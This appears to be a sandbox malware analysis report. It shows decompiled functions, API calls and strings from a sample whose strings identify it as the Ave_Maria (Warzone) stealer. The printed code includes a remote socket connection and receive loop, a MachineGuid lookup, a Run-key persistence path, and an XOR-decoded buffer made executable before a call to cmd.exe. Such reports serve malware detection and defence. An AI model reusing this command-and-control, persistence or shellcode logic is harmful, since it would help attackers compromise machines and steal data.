                                      • API String ID: 1613093083-2536721355
                                      • Opcode ID: 37ea969b55bfadfc60378cb3e4d570a0c812fe210fe7e0b2f6542b877c6b5b7b
                                      • Instruction ID: 79a073a845c186b59dca2f5087be68c3418634b982b641ade205d0a22039f1a0
                                      • Opcode Fuzzy Hash: 37ea969b55bfadfc60378cb3e4d570a0c812fe210fe7e0b2f6542b877c6b5b7b
                                      • Instruction Fuzzy Hash: 48F09036950224FBDF211FA0ED0DFDA3BADEF15751F108060FE15A6060D6F18A28EA98
                                      Uniqueness

                                      Uniqueness Score: 100.00%

                                      Function 0025538F, Relevance: 9.1, APIs: 6, Instructions: 75networksynchronizationCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 37%
                                      			E0025538F(void* __ecx, void* __eflags, char _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v28;
				intOrPtr _v32;
				void _v40;
				void* _t36;
				signed int _t40;
				signed int _t42;
				void* _t44;
				signed int _t47;
				intOrPtr _t53;
				intOrPtr _t54;
				signed int* _t55;

				_v8 = _v8 & 0x00000000;
				_t44 = __ecx;
				E00252F52(__ecx,  &_a4);
				 *((intOrPtr*)(_t44 + 4)) = _a8;
				E0025E20D(_t44 + 0x1d8);
				_t47 = 8;
				memset( &_v40, 0, _t47 << 2);
				_v28 = 6;
				_t36 =  &_v40;
				_t53 = 1;
				_v32 = 1;
				__imp__getaddrinfo(_a4, 0, _t36,  &_v8);
				if(_t36 != 0) {
					L4:
					_t53 = 0;
				} else {
					_t54 =  *((intOrPtr*)(_v8 + 0x18));
					_t40 = 2;
					__imp__#23(_t40, 1, 0);
					 *(_t44 + 0xc) = _t40;
					if(_t40 == 0xffffffff) {
						goto L4;
					} else {
						_t55 = _t44 + 0x1c8;
						 *((intOrPtr*)(_t44 + 0x1cc)) =  *((intOrPtr*)(_t54 + 4));
						_t42 = 2;
						 *_t55 = _t42;
						__imp__#9(_a8);
						 *(_t44 + 0x1ca) = _t42;
						__imp__freeaddrinfo(_v8);
						__imp__#4( *(_t44 + 0xc), _t55, 0x10);
						if(_t42 != 0xffffffff) {
							 *((intOrPtr*)(_t44 + 8)) = 1;
							ReleaseMutex( *(_t44 + 0x1d8));
						} else {
							 *(_t44 + 0xc) =  *(_t44 + 0xc) | _t42;
							goto L4;
						}
					}
				}
				E00255A2D(_a4);
				return _t53;
			}















                                      0x00255395
                                      0x002553a0
                                      0x002553a2
                                      0x002553b0
                                      0x002553b3
                                      0x002553ba
                                      0x002553c0
                                      0x002553c5
                                      0x002553cd
                                      0x002553d8
                                      0x002553d9
                                      0x002553dc
                                      0x002553e4
                                      0x00255443
                                      0x00255443
                                      0x002553e6
                                      0x002553ee
                                      0x002553f1
                                      0x002553f3
                                      0x002553f9
                                      0x002553ff
                                      0x00000000
                                      0x00255401
                                      0x00255404
                                      0x0025540c
                                      0x00255412
                                      0x00255416
                                      0x00255419
                                      0x00255422
                                      0x00255429
                                      0x00255435
                                      0x0025543e
                                      0x0025545c
                                      0x0025545f
                                      0x00255440
                                      0x00255440
                                      0x00000000
                                      0x00255440
                                      0x0025543e
                                      0x002553ff
                                      0x00255448
                                      0x00255453

                                      APIs
                                        • Part of subcall function 00252F52: lstrcatA.KERNEL32(00000000,?,?,00000000,?,002533F1,00000000,00000000,?,00254AC0,?,?,?,?,?), ref: 00252F7E
                                        • Part of subcall function 0025E20D: WaitForSingleObject.KERNEL32(?,000000FF), ref: 0025E211
                                      • getaddrinfo.WS2_32(?,00000000,00254AC8,00000000), ref: 002553DC
                                      • socket.WS2_32(00000002,00000001,00000000), ref: 002553F3
                                      • htons.WS2_32(?), ref: 00255419
                                      • freeaddrinfo.WS2_32(00000000), ref: 00255429
                                      • connect.WS2_32(?,?,00000010), ref: 00255435
                                      • ReleaseMutex.KERNEL32(?), ref: 0025545F
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424095892.00251000.00000020.00000001.sdmp, Offset: 00250000, based on PE: true
                                      • Associated: 00000000.00000002.424087091.00250000.00000004.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424120535.00262000.00000002.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424130627.00266000.00000004.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424138873.00268000.00000002.00000001.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_250000_4ifN8B061M.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: MutexObjectReleaseSingleWaitconnectfreeaddrinfogetaddrinfohtonslstrcatsocket
                                      • String ID:
                                      • API String ID: 2516106447-0
                                      • Opcode ID: cf74375c74bf8dc9a8aa02b6696324564b4cccba6c889c8d580070dee7b142f7
                                      • Instruction ID: dd3bc3e29122f321318924aad4a0b2f0e2bf90eeab3089ad568280ab40ac0d79
                                      • Opcode Fuzzy Hash: cf74375c74bf8dc9a8aa02b6696324564b4cccba6c889c8d580070dee7b142f7
                                      • Instruction Fuzzy Hash: D1219F71A00604EBDF10DF61E888BDA7BB8FF44321F108065FD09DB291D7B09A59CB64
                                      Uniqueness

                                      Uniqueness Score: 8.94%

                                      Function 012E7ABD, Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 311UNIQUELIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424346882.012E1000.00000020.00020000.sdmp, Offset: 012E0000, based on PE: true
                                      • Associated: 00000000.00000002.424335940.012E0000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424399292.01302000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424424990.0130B000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424434447.0130C000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424444007.0130D000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424454583.0130F000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424487286.013A0000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424497060.013A1000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424508147.013A4000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424518494.013A5000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424528540.013A7000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424539586.013A9000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424554021.013AD000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424563735.013AE000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424574199.013B1000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424583869.013B3000.00000002.00020000.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_12e0000_4ifN8B061M.jbxd
                                      Similarity
                                      • API ID: _strrchr
                                      • String ID: Actx
                                      • API String ID: 3213747228-89312691
                                      • Opcode ID: dcdefaa96ecba3e08e07ee987e1db02f789c16f60a938597036e37ff1907a7f4
                                      • Instruction ID: bdd8f14d8ee9926528fb3fb7fe9dd9144a888f856b515b1cfa13e3b9b07a533b
                                      • Opcode Fuzzy Hash: dcdefaa96ecba3e08e07ee987e1db02f789c16f60a938597036e37ff1907a7f4
                                      • Instruction Fuzzy Hash: 1FB1447292028B9FDB128F58C885BBEBFE5FF55310F5441A9EA44AB381D3359941CBE0
                                      Uniqueness

                                      Uniqueness Score: 100.00%

                                      Function 012E85BD, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 199COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424346882.012E1000.00000020.00020000.sdmp, Offset: 012E0000, based on PE: true
                                      • Associated: 00000000.00000002.424335940.012E0000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424399292.01302000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424424990.0130B000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424434447.0130C000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424444007.0130D000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424454583.0130F000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424487286.013A0000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424497060.013A1000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424508147.013A4000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424518494.013A5000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424528540.013A7000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424539586.013A9000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424554021.013AD000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424563735.013AE000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424574199.013B1000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424583869.013B3000.00000002.00020000.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_12e0000_4ifN8B061M.jbxd
                                      Similarity
                                      • API ID: _free
                                      • String ID: *?$.
                                      • API String ID: 269201875-3972193922
                                      • Opcode ID: 176ca1dfeeaba7049e50e9e5823c34ed6f47d4fca2541c5520a5665a2d5b650c
                                      • Instruction ID: 591b0b89443afe12f4b5e385f0552b1680a69b9e3af1e6f747d0a19ce6f3a97c
                                      • Opcode Fuzzy Hash: 176ca1dfeeaba7049e50e9e5823c34ed6f47d4fca2541c5520a5665a2d5b650c
                                      • Instruction Fuzzy Hash: E261387AD1021A9FDF15CFA8C8858EDFBF5EF58310F6441AAD985E7300E631AA418B90
                                      Uniqueness

                                      Uniqueness Score: 0.75%

                                      Function 002551E4, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 145networkUNIQUE
                                      Download Yara Rule
                                      C-Code - Quality: 79%
                                      			E002551E4(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4) {
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v36;
				char _v44;
				char _v52;
				char _v56;
				char _v60;
				char _v65600;
				void* _t45;
				char* _t52;
				intOrPtr _t77;
				void* _t83;
				void* _t84;
				void* _t85;
				void* _t108;
				char* _t109;
				void* _t112;
				void* _t113;
				void* _t114;

				_t108 = __edx;
				_t85 = __ecx;
				_t45 = E00251130(0x10040, __ecx);
				_t84 = _t85;
				if( *((intOrPtr*)(_t84 + 0xc)) != 0xffffffff) {
					_v28 = 0xea60;
					__imp__#21( *((intOrPtr*)(_t84 + 0xc)), 0xffff, 0x1006,  &_v28, 4);
					E00251052( &_v65600, 0, 0xffff);
					_t114 = _t113 + 0xc;
					_v60 = 0;
					_v56 = 0;
					E00252E33( &_v44, _t108, E002531EC( &_v12, "warzone160"));
					E00255A2D(_v12);
					_v16 = 0;
					_v12 = 0;
					do {
						_t52 =  &_v65600;
						__imp__#16( *((intOrPtr*)(_t84 + 0xc)), _t52, 0xc, 0);
						_t109 = _t52;
						if(_t109 != 0xc) {
							if(_t109 == 0xffffffff) {
								break;
							}
							goto L8;
						}
						_v24 = 0;
						_t102 =  &_v24;
						_v20 = 0;
						E00252DC1( &_v24,  &_v65600, _t52);
						_t103 = _t114;
						E00252E79(_t114,  &_v24);
						E00252E79(_t114,  &_v44);
						E00255C32( &_v52, _t108, _t114, _t103,  &_v24, _t102);
						_t114 = _t114 + 0x10;
						_t77 =  *((intOrPtr*)(_v52 + 4));
						_t112 = _t77 + 0xc;
						if(_t77 == 0 || _t112 == _t109) {
							L6:
							E00252E66( &_v52);
							E00252E66( &_v24);
						} else {
							do {
								_t83 =  &_v65600 + _t109;
								__imp__#16( *((intOrPtr*)(_t84 + 0xc)), _t83, _t112 - _t109, 0);
								_t109 = _t109 + _t83;
							} while (_t112 != _t109);
							goto L6;
						}
						L8:
						_t92 =  &_v16;
						E00252DC1( &_v16,  &_v65600, _t109);
						_t93 = _t114;
						E00252E79(_t114,  &_v16);
						E00252E79(_t114,  &_v44);
						E00255C32( &_v36, _t108, _t114, _t93,  &_v16, _t92);
						_t114 = _t114 + 0x10;
						E00252DF3(_t84 + 0x10);
						E00252DC1(_t84 + 0x10, _v36, _t109);
						E00252DF3( &_v16);
						E00252DF3( &_v36);
						E00254B8D(_t84, _t108, _a4);
						E00252E66( &_v36);
						_push(0);
						_pop(0);
					} while (_t109 > 0);
					E00252E66( &_v16);
					E00252E66( &_v44);
					return E00252E66( &_v60);
				}
				return _t45;
			}

























                                      0x002551e4
                                      0x002551e4
                                      0x002551ec
                                      0x002551f2
                                      0x002551fa
                                      0x00255205
                                      0x0025521b
                                      0x0025522c
                                      0x00255231
                                      0x00255234
                                      0x0025523a
                                      0x0025524b
                                      0x00255253
                                      0x00255258
                                      0x0025525b
                                      0x0025525e
                                      0x00255261
                                      0x0025526b
                                      0x00255271
                                      0x00255276
                                      0x002552f8
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x002552f8
                                      0x0025527f
                                      0x00255283
                                      0x00255286
                                      0x00255289
                                      0x00255293
                                      0x00255296
                                      0x002552a3
                                      0x002552ab
                                      0x002552b3
                                      0x002552b6
                                      0x002552b9
                                      0x002552be
                                      0x002552e3
                                      0x002552e6
                                      0x002552ee
                                      0x002552c4
                                      0x002552c4
                                      0x002552d1
                                      0x002552d7
                                      0x002552dd
                                      0x002552df
                                      0x00000000
                                      0x002552c4
                                      0x002552fa
                                      0x00255302
                                      0x00255305
                                      0x0025530f
                                      0x00255312
                                      0x0025531f
                                      0x00255327
                                      0x0025532c
                                      0x00255332
                                      0x0025533e
                                      0x00255346
                                      0x0025534e
                                      0x00255358
                                      0x00255360
                                      0x00255365
                                      0x00255367
                                      0x00255368
                                      0x00255373
                                      0x0025537b
                                      0x00000000
                                      0x00255383
                                      0x0025538c

                                      APIs
                                      • setsockopt.WS2_32(000000FF,0000FFFF,00001006,?,00000004), ref: 0025521B
                                        • Part of subcall function 002531EC: lstrlenA.KERNEL32(?,?,?,002555DF,.bss,00000000,?,?,00000000), ref: 002531F5
                                        • Part of subcall function 002531EC: lstrlenA.KERNEL32(?,?,?,002555DF,.bss,00000000,?,?,00000000), ref: 00253202
                                        • Part of subcall function 002531EC: lstrcpyA.KERNEL32(00000000,?,?,?,002555DF,.bss,00000000,?,?,00000000), ref: 00253215
                                        • Part of subcall function 00255A2D: VirtualFree.KERNELBASE(00000000,00000000,00008000,0025E2AE,?,?,?,?,?,00000000), ref: 00255A35
                                      • recv.WS2_32(000000FF,?,0000000C,00000000), ref: 0025526B
                                      • recv.WS2_32(000000FF,?,000000FF,00000000), ref: 002552D7
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424095892.00251000.00000020.00000001.sdmp, Offset: 00250000, based on PE: true
                                      • Associated: 00000000.00000002.424087091.00250000.00000004.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424120535.00262000.00000002.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424130627.00266000.00000004.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424138873.00268000.00000002.00000001.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_250000_4ifN8B061M.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrlenrecv$FreeVirtuallstrcpysetsockopt
                                      • String ID: `$warzone160
                                      • API String ID: 3973575906-811885577
                                      • Opcode ID: c79ade6264ebbed59af71abca3b8d404e7134565af88a31a1811f43d73badc75
                                      • Instruction ID: c45ecc119077b808d53f16043192cca4eb278338beec44f04e6859f65112ef12
                                      • Opcode Fuzzy Hash: c79ade6264ebbed59af71abca3b8d404e7134565af88a31a1811f43d73badc75
                                      • Instruction Fuzzy Hash: 2A417071920128EBCB15EF90DC96DEEBB38EF05351F004159FC15A6191DB706A6CCFA8
                                      Uniqueness

                                      Uniqueness Score: 100.00%

                                      Function 0025DC53, Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 65registryUNIQUE
                                      Download Yara Rule
                                      C-Code - Quality: 32%
                                      			E0025DC53(intOrPtr* __ecx, void* __edx) {
				void* _v8;
				char _v12;
				char _v16;
				int _v20;
				char _v24;
				int* _t18;
				void* _t48;
				int* _t50;
				intOrPtr _t53;

				_t48 = __edx;
				_t35 = __ecx;
				_t50 = __ecx;
				_v8 = 0;
				_v24 = 0;
				_v20 = 0;
				 *((intOrPtr*)(__ecx)) = 0;
				 *((intOrPtr*)(__ecx + 4)) = 0;
				_t53 =  *0x267d48; // 0x0
				if(_t53 != 0) {
					_t18 = 0x267d44;
				} else {
					RegOpenKeyExW(0x80000002,  *(E00253412( &_v12, L"SOFTWARE\\Microsoft\\Cryptography")), 0, 0x101,  &_v8);
					asm("sbb esi, esi");
					E00255A2D(_v12);
					if(1 != 0) {
						E0025EF61( &_v8, _t48, E00253412( &_v12, L"MachineGuid"),  &_v24);
						E00255A2D(_v12);
						E0025EF4C( &_v8);
					}
					E00252CCC(_t50, E00255C02( &_v16,  &_v24));
					E00252E66( &_v16);
					_t35 = 0x267d44;
					_t18 = _t50;
				}
				E00252CCC(_t35, _t18);
				E00252E66( &_v24);
				E0025EF4C( &_v8);
				return _t50;
			}












                                      0x0025dc53
                                      0x0025dc53
                                      0x0025dc5d
                                      0x0025dc5f
                                      0x0025dc62
                                      0x0025dc65
                                      0x0025dc68
                                      0x0025dc6a
                                      0x0025dc6d
                                      0x0025dc73
                                      0x0025dcfc
                                      0x0025dc79
                                      0x0025dc97
                                      0x0025dca2
                                      0x0025dca4
                                      0x0025dcac
                                      0x0025dcc3
                                      0x0025dccb
                                      0x0025dcd3
                                      0x0025dcd3
                                      0x0025dce6
                                      0x0025dcee
                                      0x0025dcf3
                                      0x0025dcf8
                                      0x0025dcf8
                                      0x0025dd02
                                      0x0025dd0a
                                      0x0025dd12
                                      0x0025dd1c

                                      APIs
                                        • Part of subcall function 00253412: lstrlenW.KERNEL32(0025FC61,00000000,?,0025FC61,00000000,?,00000000), ref: 0025341B
                                        • Part of subcall function 00253412: lstrlenW.KERNEL32(0025FC61,?,0025FC61,00000000,?,00000000), ref: 00253432
                                        • Part of subcall function 00253412: lstrcpyW.KERNEL32(?,0025FC61), ref: 0025344D
                                      • RegOpenKeyExW.ADVAPI32(80000002,00000000,00000000,00000101,?,SOFTWARE\Microsoft\Cryptography,?,?,?,?,00000000,?,?,?), ref: 0025DC97
                                        • Part of subcall function 00255A2D: VirtualFree.KERNELBASE(00000000,00000000,00008000,0025E2AE,?,?,?,?,?,00000000), ref: 00255A35
                                        • Part of subcall function 0025EF61: RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,00000000,?,00000000,?,?,?,?,0025F3B9,?,0000000A,80000001), ref: 0025EF84
                                        • Part of subcall function 0025EF61: RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,00000000,?,0025F3B9,?,0000000A,80000001,?,000F003F,00000000,00000000,Software\Microsoft\Windows\CurrentVersion\Run\), ref: 0025EFA7
                                        • Part of subcall function 0025EF4C: RegCloseKey.KERNEL32(?,?,0025F043,?,0025F392,80000001,?,000F003F,00000000,00000000,Software\Microsoft\Windows\CurrentVersion\Run\,00000000,InitWindows,00000000,inst,?), ref: 0025EF56
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424095892.00251000.00000020.00000001.sdmp, Offset: 00250000, based on PE: true
                                      • Associated: 00000000.00000002.424087091.00250000.00000004.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424120535.00262000.00000002.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424130627.00266000.00000004.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424138873.00268000.00000002.00000001.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_250000_4ifN8B061M.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: QueryValuelstrlen$CloseFreeOpenVirtuallstrcpy
                                      • String ID: D}&$D}&$MachineGuid$SOFTWARE\Microsoft\Cryptography
                                      • API String ID: 1903904756-2195274810
                                      • Opcode ID: 71b23118d6708ff81288e3f674bf21b896d68ececb81cce4efec39c1041be0a2
                                      • Instruction ID: e7ef40736b9b7e30af7df9140b9afb54ad7538a8ee95575d5176bbc788a9a8dd
                                      • Opcode Fuzzy Hash: 71b23118d6708ff81288e3f674bf21b896d68ececb81cce4efec39c1041be0a2
                                      • Instruction Fuzzy Hash: A6114F71920119EBCB18FB94D9528EDB778AF51702B600169B801B3192EFB06F6DCB94
                                      Uniqueness

                                      Uniqueness Score: 100.00%

                                      Function 0025EAC8, Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 61windowUNIQUE
                                      Download Yara Rule
                                      C-Code - Quality: 74%
                                      			E0025EAC8(void* __ecx, void* __eflags) {
				void* _v8;
				char _v12;
				char _v16;
				intOrPtr _v40;
				char _v44;
				void* _t15;
				intOrPtr* _t16;
				intOrPtr _t34;
				void* _t45;

				_t45 = __eflags;
				_t15 = E0025E8EC();
				_push(__ecx);
				_t16 = E0025E907(_t15, "VirtualQuery", _t45);
				if(_t16 != 0) {
					_t16 =  *_t16(E0025EAC8,  &_v44, 0x1c);
					_t34 = _v40;
					_t47 = _t34;
					if(_t34 != 0) {
						E0025E762(_t34, _t47);
						MessageBoxA(0, "Bla2", "Bla2", 0);
						_push(_t34);
						_v12 = 0;
						E0025EB77( &_v16, _t47, E00253412( &_v8, L"Ave_Maria Stealer OpenSource github Link: https://github.com/syohex/java-simple-mine-sweeper"),  &_v12);
						E00255A2D(_v8);
						_v8 = 0;
						E00255A2D(0);
						_push(0);
						_v12 = 0;
						E0025EB77( &_v16, _t47, E00253412( &_v8, L"C:\\Users\\Vitali Kremez\\Documents\\MidgetPorn\\workspace\\MsgBox.exe"),  &_v12);
						E00255A2D(_v8);
						_v8 = 0;
						return E00255A2D(0);
					}
				}
				return _t16;
			}












                                      0x0025eac8
                                      0x0025eacf
                                      0x0025ead4
                                      0x0025eadc
                                      0x0025eae4
                                      0x0025eaf5
                                      0x0025eaf7
                                      0x0025eafa
                                      0x0025eafc
                                      0x0025eafe
                                      0x0025eb0e
                                      0x0025eb14
                                      0x0025eb18
                                      0x0025eb2d
                                      0x0025eb35
                                      0x0025eb3c
                                      0x0025eb3f
                                      0x0025eb44
                                      0x0025eb48
                                      0x0025eb5d
                                      0x0025eb65
                                      0x0025eb6c
                                      0x00000000
                                      0x0025eb6f
                                      0x0025eafc
                                      0x0025eb76

                                      APIs
                                        • Part of subcall function 0025E907: lstrcmpA.KERNEL32(?,0025F9CB,?,open,0025F9CB), ref: 0025E940
                                      • MessageBoxA.USER32(00000000,Bla2,Bla2,00000000), ref: 0025EB0E
                                        • Part of subcall function 00253412: lstrlenW.KERNEL32(0025FC61,00000000,?,0025FC61,00000000,?,00000000), ref: 0025341B
                                        • Part of subcall function 00253412: lstrlenW.KERNEL32(0025FC61,?,0025FC61,00000000,?,00000000), ref: 00253432
                                        • Part of subcall function 00253412: lstrcpyW.KERNEL32(?,0025FC61), ref: 0025344D
                                        • Part of subcall function 0025EB77: CreateProcessW.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 0025EBB2
                                        • Part of subcall function 00255A2D: VirtualFree.KERNELBASE(00000000,00000000,00008000,0025E2AE,?,?,?,?,?,00000000), ref: 00255A35
                                      Strings
                                      • C:\Users\Vitali Kremez\Documents\MidgetPorn\workspace\MsgBox.exe, xrefs: 0025EB4C
                                      • VirtualQuery, xrefs: 0025EAD5
                                      • Ave_Maria Stealer OpenSource github Link: https://github.com/syohex/java-simple-mine-sweeper, xrefs: 0025EB1C
                                      • Bla2, xrefs: 0025EB05, 0025EB0B, 0025EB0C
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424095892.00251000.00000020.00000001.sdmp, Offset: 00250000, based on PE: true
                                      • Associated: 00000000.00000002.424087091.00250000.00000004.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424120535.00262000.00000002.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424130627.00266000.00000004.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424138873.00268000.00000002.00000001.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_250000_4ifN8B061M.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrlen$CreateFreeMessageProcessVirtuallstrcmplstrcpy
                                      • String ID: Ave_Maria Stealer OpenSource github Link: https://github.com/syohex/java-simple-mine-sweeper$Bla2$C:\Users\Vitali Kremez\Documents\MidgetPorn\workspace\MsgBox.exe$VirtualQuery
                                      • API String ID: 1196126833-2308542105
                                      • Opcode ID: e29e3945979fc35815a7270c7a93f32b5a477ca68f7d15a9d44b652aa4e91212
                                      • Instruction ID: a601f0253320b603076f92d49f3d669fa0d6d4b2c1f2c5dca51f4ad502b4771b
                                      • Opcode Fuzzy Hash: e29e3945979fc35815a7270c7a93f32b5a477ca68f7d15a9d44b652aa4e91212
                                      • Instruction Fuzzy Hash: FC117771920514BA8F0CFBA0DD57CEE7B7CEF04712B104159F802A2582DF305F69CA69
                                      Uniqueness

                                      Uniqueness Score: 100.00%

                                      Function 0025F73D, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 55memorystringUNIQUE
                                      Download Yara Rule
                                      C-Code - Quality: 73%
                                      			E0025F73D(void* __ecx) {
				long _v8;
				void* _t7;
				void* _t17;
				void* _t24;
				void* _t26;
				WCHAR* _t31;

				_push(__ecx);
				_t17 = __ecx;
				_t26 = E002510AD(0x800);
				_t24 = _t26;
				_t7 = 0x601;
				do {
					 *_t24 =  *(0x263c00 + _t24) ^ 0x00000045;
					_t24 = _t24 + 1;
					_t7 = _t7 - 1;
				} while (_t7 != 0);
				VirtualProtect(_t26, 0x7d0, 0x40,  &_v8);
				_t31 = VirtualAlloc(0, 0x1fe, 0x1000, 0x40);
				GetWindowsDirectoryW(_t31, 0x104);
				E0025102C( &(_t31[lstrlenW(_t31)]), L"\\System32\\cmd.exe", 0x28);
				_t5 = _t26 + 0xef; // 0xef
				return  *_t5(_t31, _t17, 0, 0);
			}









                                      0x0025f740
                                      0x0025f749
                                      0x0025f750
                                      0x0025f758
                                      0x0025f75c
                                      0x0025f761
                                      0x0025f767
                                      0x0025f769
                                      0x0025f76a
                                      0x0025f76a
                                      0x0025f77b
                                      0x0025f795
                                      0x0025f79d
                                      0x0025f7b5
                                      0x0025f7bd
                                      0x0025f7cf

                                      APIs
                                        • Part of subcall function 002510AD: GetProcessHeap.KERNEL32(00000000,00000000,0025F750,00000800,00000000,00000000,?,00000000,?,0025F8BB,?,?,?,0025535D,?,00000000), ref: 002510B3
                                        • Part of subcall function 002510AD: HeapAlloc.KERNEL32(00000000,?,00000000,?,0025F8BB,?,?,?,0025535D,?,00000000,00000000,?,?,?,00000000), ref: 002510BA
                                      • VirtualProtect.KERNEL32(00000000,000007D0,00000040,00000000,00000000,00000000,?,00000000,?,0025F8BB,?,?,?,0025535D,?,00000000), ref: 0025F77B
                                      • VirtualAlloc.KERNEL32(00000000,000001FE,00001000,00000040,?,00000000,?,0025F8BB,?,?,?,0025535D,?,00000000,00000000), ref: 0025F78F
                                      • GetWindowsDirectoryW.KERNEL32(00000000,00000104,?,00000000,?,0025F8BB,?,?,?,0025535D,?,00000000,00000000,?,?,?), ref: 0025F79D
                                      • lstrlenW.KERNEL32(00000000,\System32\cmd.exe,00000028,?,00000000,?,0025F8BB,?,?,?,0025535D,?,00000000,00000000), ref: 0025F7AB
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424095892.00251000.00000020.00000001.sdmp, Offset: 00250000, based on PE: true
                                      • Associated: 00000000.00000002.424087091.00250000.00000004.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424120535.00262000.00000002.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424130627.00266000.00000004.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424138873.00268000.00000002.00000001.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_250000_4ifN8B061M.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AllocHeapVirtual$DirectoryProcessProtectWindowslstrlen
                                      • String ID: \System32\cmd.exe
                                      • API String ID: 34486464-2003734499
                                      • Opcode ID: f3371f942879826852fd0c0c2ca2b72bbab4298c5971ce20a4027c22153ec441
                                      • Instruction ID: 51a1c3d9850853cf5bcd47baaf705e7dec947efe70d526fb6134769587a23635
                                      • Opcode Fuzzy Hash: f3371f942879826852fd0c0c2ca2b72bbab4298c5971ce20a4027c22153ec441
                                      • Instruction Fuzzy Hash: 61017B71740751BBF2205774AD0AFAB3B9CDB8BB51F104024FB08EA1C1C9F5AC198798
                                      Uniqueness

                                      Uniqueness Score: 100.00%

                                      Function 012E5312, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderUNIQUELIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,012E52C3,?,?,012E528B,?,00000000), ref: 012E5332
                                      • GetProcAddress.KERNEL32(00000000,CorExitProcess,00000000,?,?,?,012E52C3,?,?,012E528B,?,00000000), ref: 012E5345
                                      • FreeLibrary.KERNEL32(00000000,?,?,?,012E52C3,?,?,012E528B,?,00000000), ref: 012E5368
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424346882.012E1000.00000020.00020000.sdmp, Offset: 012E0000, based on PE: true
                                      • Associated: 00000000.00000002.424335940.012E0000.00000002.00020000.sdmp Download File
